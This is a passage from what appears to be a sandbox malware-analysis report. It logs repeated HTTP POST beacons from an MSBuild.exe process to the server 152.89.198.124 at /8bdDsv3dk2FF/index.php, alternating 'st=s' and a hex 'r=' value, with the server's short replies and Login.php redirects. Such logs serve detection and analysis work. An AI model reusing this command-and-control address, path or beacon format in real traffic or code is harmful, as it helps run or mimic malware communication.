                                                                                                Data Ascii: r=44D59F58A17DF2709A20C7737DB69E5240BE75D65E29C403441A1D7E8ADBF4921815D1D52283D829CCC717A9D0138FC4E52383A11C5FE7EFF6623937C9FCEADF109548710C74ACB426903EC1
                                                                                                Oct 27, 2024 17:11:04.068958044 CET196INHTTP/1.1 200 OK
                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                Date: Sun, 27 Oct 2024 16:11:03 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 7 <c><d>0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                2192.168.2.457736152.89.198.124802284C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 27, 2024 17:11:05.781279087 CET160OUTPOST /8bdDsv3dk2FF/index.php HTTP/1.1
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Host: 152.89.198.124
                                                                                                Content-Length: 4
                                                                                                Cache-Control: no-cache
                                                                                                Data Raw: 73 74 3d 73
                                                                                                Data Ascii: st=s
                                                                                                Oct 27, 2024 17:11:06.681996107 CET219INHTTP/1.1 200 OK
                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                Date: Sun, 27 Oct 2024 16:11:06 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Refresh: 0; url = Login.php
                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 1 0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                3192.168.2.457751152.89.198.124802284C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 27, 2024 17:11:08.200527906 CET312OUTPOST /8bdDsv3dk2FF/index.php HTTP/1.1
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Host: 152.89.198.124
                                                                                                Content-Length: 154
                                                                                                Cache-Control: no-cache
                                                                                                Data Raw: 72 3d 34 34 44 35 39 46 35 38 41 31 37 44 46 32 37 30 39 41 32 30 43 37 37 33 37 44 42 36 39 45 35 32 34 30 42 45 37 35 44 36 35 45 32 39 43 34 30 33 34 34 31 41 31 44 37 45 38 41 44 42 46 34 39 32 31 38 31 35 44 31 44 35 32 32 38 33 44 38 32 39 43 43 43 37 31 37 41 39 44 30 31 33 38 46 43 34 45 35 32 33 38 33 41 31 31 43 35 46 45 37 45 46 46 36 36 32 33 39 33 37 43 39 46 43 45 41 44 46 31 30 39 35 34 38 37 31 30 43 37 34 41 43 42 34 32 36 39 30 33 45 43 31
                                                                                                Data Ascii: r=44D59F58A17DF2709A20C7737DB69E5240BE75D65E29C403441A1D7E8ADBF4921815D1D52283D829CCC717A9D0138FC4E52383A11C5FE7EFF6623937C9FCEADF109548710C74ACB426903EC1
                                                                                                Oct 27, 2024 17:11:09.075877905 CET196INHTTP/1.1 200 OK
                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                Date: Sun, 27 Oct 2024 16:11:08 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 7 <c><d>0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                4192.168.2.457767152.89.198.124802284C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 27, 2024 17:11:10.764023066 CET160OUTPOST /8bdDsv3dk2FF/index.php HTTP/1.1
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Host: 152.89.198.124
                                                                                                Content-Length: 4
                                                                                                Cache-Control: no-cache
                                                                                                Data Raw: 73 74 3d 73
                                                                                                Data Ascii: st=s
                                                                                                Oct 27, 2024 17:11:11.640331030 CET219INHTTP/1.1 200 OK
                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                Date: Sun, 27 Oct 2024 16:11:11 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Refresh: 0; url = Login.php
                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 1 0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                5192.168.2.457783152.89.198.124802284C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 27, 2024 17:11:13.156743050 CET312OUTPOST /8bdDsv3dk2FF/index.php HTTP/1.1
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Host: 152.89.198.124
                                                                                                Content-Length: 154
                                                                                                Cache-Control: no-cache
                                                                                                Data Raw: 72 3d 34 34 44 35 39 46 35 38 41 31 37 44 46 32 37 30 39 41 32 30 43 37 37 33 37 44 42 36 39 45 35 32 34 30 42 45 37 35 44 36 35 45 32 39 43 34 30 33 34 34 31 41 31 44 37 45 38 41 44 42 46 34 39 32 31 38 31 35 44 31 44 35 32 32 38 33 44 38 32 39 43 43 43 37 31 37 41 39 44 30 31 33 38 46 43 34 45 35 32 33 38 33 41 31 31 43 35 46 45 37 45 46 46 36 36 32 33 39 33 37 43 39 46 43 45 41 44 46 31 30 39 35 34 38 37 31 30 43 37 34 41 43 42 34 32 36 39 30 33 45 43 31
                                                                                                Data Ascii: r=44D59F58A17DF2709A20C7737DB69E5240BE75D65E29C403441A1D7E8ADBF4921815D1D52283D829CCC717A9D0138FC4E52383A11C5FE7EFF6623937C9FCEADF109548710C74ACB426903EC1
                                                                                                Oct 27, 2024 17:11:14.043231964 CET196INHTTP/1.1 200 OK
                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                Date: Sun, 27 Oct 2024 16:11:13 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 7 <c><d>0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                6192.168.2.457795152.89.198.124802284C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 27, 2024 17:11:15.686041117 CET160OUTPOST /8bdDsv3dk2FF/index.php HTTP/1.1
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Host: 152.89.198.124
                                                                                                Content-Length: 4
                                                                                                Cache-Control: no-cache
                                                                                                Data Raw: 73 74 3d 73
                                                                                                Data Ascii: st=s
                                                                                                Oct 27, 2024 17:11:16.563880920 CET219INHTTP/1.1 200 OK
                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                Date: Sun, 27 Oct 2024 16:11:16 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Refresh: 0; url = Login.php
                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 1 0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                7192.168.2.457808152.89.198.124802284C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 27, 2024 17:11:18.075803041 CET312OUTPOST /8bdDsv3dk2FF/index.php HTTP/1.1
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Host: 152.89.198.124
                                                                                                Content-Length: 154
                                                                                                Cache-Control: no-cache
                                                                                                Data Raw: 72 3d 34 34 44 35 39 46 35 38 41 31 37 44 46 32 37 30 39 41 32 30 43 37 37 33 37 44 42 36 39 45 35 32 34 30 42 45 37 35 44 36 35 45 32 39 43 34 30 33 34 34 31 41 31 44 37 45 38 41 44 42 46 34 39 32 31 38 31 35 44 31 44 35 32 32 38 33 44 38 32 39 43 43 43 37 31 37 41 39 44 30 31 33 38 46 43 34 45 35 32 33 38 33 41 31 31 43 35 46 45 37 45 46 46 36 36 32 33 39 33 37 43 39 46 43 45 41 44 46 31 30 39 35 34 38 37 31 30 43 37 34 41 43 42 34 32 36 39 30 33 45 43 31
                                                                                                Data Ascii: r=44D59F58A17DF2709A20C7737DB69E5240BE75D65E29C403441A1D7E8ADBF4921815D1D52283D829CCC717A9D0138FC4E52383A11C5FE7EFF6623937C9FCEADF109548710C74ACB426903EC1
                                                                                                Oct 27, 2024 17:11:18.955905914 CET196INHTTP/1.1 200 OK
                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                Date: Sun, 27 Oct 2024 16:11:18 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 7 <c><d>0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                8192.168.2.457824152.89.198.124802284C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 27, 2024 17:11:20.591247082 CET160OUTPOST /8bdDsv3dk2FF/index.php HTTP/1.1
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Host: 152.89.198.124
                                                                                                Content-Length: 4
                                                                                                Cache-Control: no-cache
                                                                                                Data Raw: 73 74 3d 73
                                                                                                Data Ascii: st=s
                                                                                                Oct 27, 2024 17:11:21.495649099 CET219INHTTP/1.1 200 OK
                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                Date: Sun, 27 Oct 2024 16:11:21 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Refresh: 0; url = Login.php
                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 1 0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                9192.168.2.457835152.89.198.124802284C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 27, 2024 17:11:23.015571117 CET312OUTPOST /8bdDsv3dk2FF/index.php HTTP/1.1
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Host: 152.89.198.124
                                                                                                Content-Length: 154
                                                                                                Cache-Control: no-cache
                                                                                                Data Raw: 72 3d 34 34 44 35 39 46 35 38 41 31 37 44 46 32 37 30 39 41 32 30 43 37 37 33 37 44 42 36 39 45 35 32 34 30 42 45 37 35 44 36 35 45 32 39 43 34 30 33 34 34 31 41 31 44 37 45 38 41 44 42 46 34 39 32 31 38 31 35 44 31 44 35 32 32 38 33 44 38 32 39 43 43 43 37 31 37 41 39 44 30 31 33 38 46 43 34 45 35 32 33 38 33 41 31 31 43 35 46 45 37 45 46 46 36 36 32 33 39 33 37 43 39 46 43 45 41 44 46 31 30 39 35 34 38 37 31 30 43 37 34 41 43 42 34 32 36 39 30 33 45 43 31
                                                                                                Data Ascii: r=44D59F58A17DF2709A20C7737DB69E5240BE75D65E29C403441A1D7E8ADBF4921815D1D52283D829CCC717A9D0138FC4E52383A11C5FE7EFF6623937C9FCEADF109548710C74ACB426903EC1
                                                                                                Oct 27, 2024 17:11:23.888232946 CET196INHTTP/1.1 200 OK
                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                Date: Sun, 27 Oct 2024 16:11:23 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 7 <c><d>0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                10192.168.2.457846152.89.198.124802284C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 27, 2024 17:11:25.516392946 CET160OUTPOST /8bdDsv3dk2FF/index.php HTTP/1.1
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Host: 152.89.198.124
                                                                                                Content-Length: 4
                                                                                                Cache-Control: no-cache
                                                                                                Data Raw: 73 74 3d 73
                                                                                                Data Ascii: st=s
                                                                                                Oct 27, 2024 17:11:26.641118050 CET219INHTTP/1.1 200 OK
                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                Date: Sun, 27 Oct 2024 16:11:26 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Refresh: 0; url = Login.php
                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 1 0
                                                                                                Oct 27, 2024 17:11:26.641850948 CET219INHTTP/1.1 200 OK
                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                Date: Sun, 27 Oct 2024 16:11:26 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Refresh: 0; url = Login.php
                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 1 0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                11192.168.2.457862152.89.198.124802284C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 27, 2024 17:11:28.153795004 CET312OUTPOST /8bdDsv3dk2FF/index.php HTTP/1.1
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Host: 152.89.198.124
                                                                                                Content-Length: 154
                                                                                                Cache-Control: no-cache
                                                                                                Data Raw: 72 3d 34 34 44 35 39 46 35 38 41 31 37 44 46 32 37 30 39 41 32 30 43 37 37 33 37 44 42 36 39 45 35 32 34 30 42 45 37 35 44 36 35 45 32 39 43 34 30 33 34 34 31 41 31 44 37 45 38 41 44 42 46 34 39 32 31 38 31 35 44 31 44 35 32 32 38 33 44 38 32 39 43 43 43 37 31 37 41 39 44 30 31 33 38 46 43 34 45 35 32 33 38 33 41 31 31 43 35 46 45 37 45 46 46 36 36 32 33 39 33 37 43 39 46 43 45 41 44 46 31 30 39 35 34 38 37 31 30 43 37 34 41 43 42 34 32 36 39 30 33 45 43 31
                                                                                                Data Ascii: r=44D59F58A17DF2709A20C7737DB69E5240BE75D65E29C403441A1D7E8ADBF4921815D1D52283D829CCC717A9D0138FC4E52383A11C5FE7EFF6623937C9FCEADF109548710C74ACB426903EC1
                                                                                                Oct 27, 2024 17:11:29.299602032 CET196INHTTP/1.1 200 OK
                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                Date: Sun, 27 Oct 2024 16:11:28 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 7 <c><d>0
                                                                                                Oct 27, 2024 17:11:29.300141096 CET196INHTTP/1.1 200 OK
                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                Date: Sun, 27 Oct 2024 16:11:28 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 7 <c><d>0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                12192.168.2.457878152.89.198.124802284C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 27, 2024 17:11:30.935889959 CET160OUTPOST /8bdDsv3dk2FF/index.php HTTP/1.1
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Host: 152.89.198.124
                                                                                                Content-Length: 4
                                                                                                Cache-Control: no-cache
                                                                                                Data Raw: 73 74 3d 73
                                                                                                Data Ascii: st=s
                                                                                                Oct 27, 2024 17:11:31.930165052 CET219INHTTP/1.1 200 OK
                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                Date: Sun, 27 Oct 2024 16:11:31 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Refresh: 0; url = Login.php
                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 1 0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                13192.168.2.457893152.89.198.124802284C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 27, 2024 17:11:33.451251030 CET312OUTPOST /8bdDsv3dk2FF/index.php HTTP/1.1
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Host: 152.89.198.124
                                                                                                Content-Length: 154
                                                                                                Cache-Control: no-cache
                                                                                                Data Raw: 72 3d 34 34 44 35 39 46 35 38 41 31 37 44 46 32 37 30 39 41 32 30 43 37 37 33 37 44 42 36 39 45 35 32 34 30 42 45 37 35 44 36 35 45 32 39 43 34 30 33 34 34 31 41 31 44 37 45 38 41 44 42 46 34 39 32 31 38 31 35 44 31 44 35 32 32 38 33 44 38 32 39 43 43 43 37 31 37 41 39 44 30 31 33 38 46 43 34 45 35 32 33 38 33 41 31 31 43 35 46 45 37 45 46 46 36 36 32 33 39 33 37 43 39 46 43 45 41 44 46 31 30 39 35 34 38 37 31 30 43 37 34 41 43 42 34 32 36 39 30 33 45 43 31
                                                                                                Data Ascii: r=44D59F58A17DF2709A20C7737DB69E5240BE75D65E29C403441A1D7E8ADBF4921815D1D52283D829CCC717A9D0138FC4E52383A11C5FE7EFF6623937C9FCEADF109548710C74ACB426903EC1
                                                                                                Oct 27, 2024 17:11:34.330238104 CET196INHTTP/1.1 200 OK
                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                Date: Sun, 27 Oct 2024 16:11:34 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 7 <c><d>0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                14192.168.2.457909152.89.198.124802284C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 27, 2024 17:11:35.966837883 CET160OUTPOST /8bdDsv3dk2FF/index.php HTTP/1.1
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Host: 152.89.198.124
                                                                                                Content-Length: 4
                                                                                                Cache-Control: no-cache
                                                                                                Data Raw: 73 74 3d 73
                                                                                                Data Ascii: st=s
                                                                                                Oct 27, 2024 17:11:36.862191916 CET219INHTTP/1.1 200 OK
                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                Date: Sun, 27 Oct 2024 16:11:36 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Refresh: 0; url = Login.php
                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 1 0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                15192.168.2.457920152.89.198.124802284C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 27, 2024 17:11:38.375391006 CET312OUTPOST /8bdDsv3dk2FF/index.php HTTP/1.1
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Host: 152.89.198.124
                                                                                                Content-Length: 154
                                                                                                Cache-Control: no-cache
                                                                                                Data Raw: 72 3d 34 34 44 35 39 46 35 38 41 31 37 44 46 32 37 30 39 41 32 30 43 37 37 33 37 44 42 36 39 45 35 32 34 30 42 45 37 35 44 36 35 45 32 39 43 34 30 33 34 34 31 41 31 44 37 45 38 41 44 42 46 34 39 32 31 38 31 35 44 31 44 35 32 32 38 33 44 38 32 39 43 43 43 37 31 37 41 39 44 30 31 33 38 46 43 34 45 35 32 33 38 33 41 31 31 43 35 46 45 37 45 46 46 36 36 32 33 39 33 37 43 39 46 43 45 41 44 46 31 30 39 35 34 38 37 31 30 43 37 34 41 43 42 34 32 36 39 30 33 45 43 31
                                                                                                Data Ascii: r=44D59F58A17DF2709A20C7737DB69E5240BE75D65E29C403441A1D7E8ADBF4921815D1D52283D829CCC717A9D0138FC4E52383A11C5FE7EFF6623937C9FCEADF109548710C74ACB426903EC1
                                                                                                Oct 27, 2024 17:11:39.302932978 CET196INHTTP/1.1 200 OK
                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                Date: Sun, 27 Oct 2024 16:11:39 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 7 <c><d>0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                16192.168.2.457936152.89.198.124802284C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 27, 2024 17:11:40.934854031 CET160OUTPOST /8bdDsv3dk2FF/index.php HTTP/1.1
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Host: 152.89.198.124
                                                                                                Content-Length: 4
                                                                                                Cache-Control: no-cache
                                                                                                Data Raw: 73 74 3d 73
                                                                                                Data Ascii: st=s
                                                                                                Oct 27, 2024 17:11:41.815068007 CET219INHTTP/1.1 200 OK
                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                Date: Sun, 27 Oct 2024 16:11:41 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Refresh: 0; url = Login.php
                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 1 0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                17192.168.2.457947152.89.198.124802284C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 27, 2024 17:11:43.399909019 CET312OUTPOST /8bdDsv3dk2FF/index.php HTTP/1.1
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Host: 152.89.198.124
                                                                                                Content-Length: 154
                                                                                                Cache-Control: no-cache
                                                                                                Data Raw: 72 3d 34 34 44 35 39 46 35 38 41 31 37 44 46 32 37 30 39 41 32 30 43 37 37 33 37 44 42 36 39 45 35 32 34 30 42 45 37 35 44 36 35 45 32 39 43 34 30 33 34 34 31 41 31 44 37 45 38 41 44 42 46 34 39 32 31 38 31 35 44 31 44 35 32 32 38 33 44 38 32 39 43 43 43 37 31 37 41 39 44 30 31 33 38 46 43 34 45 35 32 33 38 33 41 31 31 43 35 46 45 37 45 46 46 36 36 32 33 39 33 37 43 39 46 43 45 41 44 46 31 30 39 35 34 38 37 31 30 43 37 34 41 43 42 34 32 36 39 30 33 45 43 31
                                                                                                Data Ascii: r=44D59F58A17DF2709A20C7737DB69E5240BE75D65E29C403441A1D7E8ADBF4921815D1D52283D829CCC717A9D0138FC4E52383A11C5FE7EFF6623937C9FCEADF109548710C74ACB426903EC1
                                                                                                Oct 27, 2024 17:11:44.290601969 CET196INHTTP/1.1 200 OK
                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                Date: Sun, 27 Oct 2024 16:11:44 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 7 <c><d>0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                18192.168.2.457963152.89.198.124802284C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 27, 2024 17:11:46.126533031 CET160OUTPOST /8bdDsv3dk2FF/index.php HTTP/1.1
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Host: 152.89.198.124
                                                                                                Content-Length: 4
                                                                                                Cache-Control: no-cache
                                                                                                Data Raw: 73 74 3d 73
                                                                                                Data Ascii: st=s
                                                                                                Oct 27, 2024 17:11:47.035291910 CET219INHTTP/1.1 200 OK
                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                Date: Sun, 27 Oct 2024 16:11:46 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Refresh: 0; url = Login.php
                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 1 0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                19192.168.2.457979152.89.198.124802284C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 27, 2024 17:11:48.781318903 CET312OUTPOST /8bdDsv3dk2FF/index.php HTTP/1.1
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Host: 152.89.198.124
                                                                                                Content-Length: 154
                                                                                                Cache-Control: no-cache
                                                                                                Data Raw: 72 3d 34 34 44 35 39 46 35 38 41 31 37 44 46 32 37 30 39 41 32 30 43 37 37 33 37 44 42 36 39 45 35 32 34 30 42 45 37 35 44 36 35 45 32 39 43 34 30 33 34 34 31 41 31 44 37 45 38 41 44 42 46 34 39 32 31 38 31 35 44 31 44 35 32 32 38 33 44 38 32 39 43 43 43 37 31 37 41 39 44 30 31 33 38 46 43 34 45 35 32 33 38 33 41 31 31 43 35 46 45 37 45 46 46 36 36 32 33 39 33 37 43 39 46 43 45 41 44 46 31 30 39 35 34 38 37 31 30 43 37 34 41 43 42 34 32 36 39 30 33 45 43 31
                                                                                                Data Ascii: r=44D59F58A17DF2709A20C7737DB69E5240BE75D65E29C403441A1D7E8ADBF4921815D1D52283D829CCC717A9D0138FC4E52383A11C5FE7EFF6623937C9FCEADF109548710C74ACB426903EC1
                                                                                                Oct 27, 2024 17:11:49.677695036 CET196INHTTP/1.1 200 OK
                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                Date: Sun, 27 Oct 2024 16:11:49 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 7 <c><d>0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                20192.168.2.457994152.89.198.124802284C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 27, 2024 17:11:51.466300964 CET160OUTPOST /8bdDsv3dk2FF/index.php HTTP/1.1
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Host: 152.89.198.124
                                                                                                Content-Length: 4
                                                                                                Cache-Control: no-cache
                                                                                                Data Raw: 73 74 3d 73
                                                                                                Data Ascii: st=s
                                                                                                Oct 27, 2024 17:11:52.348561049 CET219INHTTP/1.1 200 OK
                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                Date: Sun, 27 Oct 2024 16:11:52 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Refresh: 0; url = Login.php
                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 1 0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                21192.168.2.457998152.89.198.124802284C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 27, 2024 17:11:53.856777906 CET312OUTPOST /8bdDsv3dk2FF/index.php HTTP/1.1
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Host: 152.89.198.124
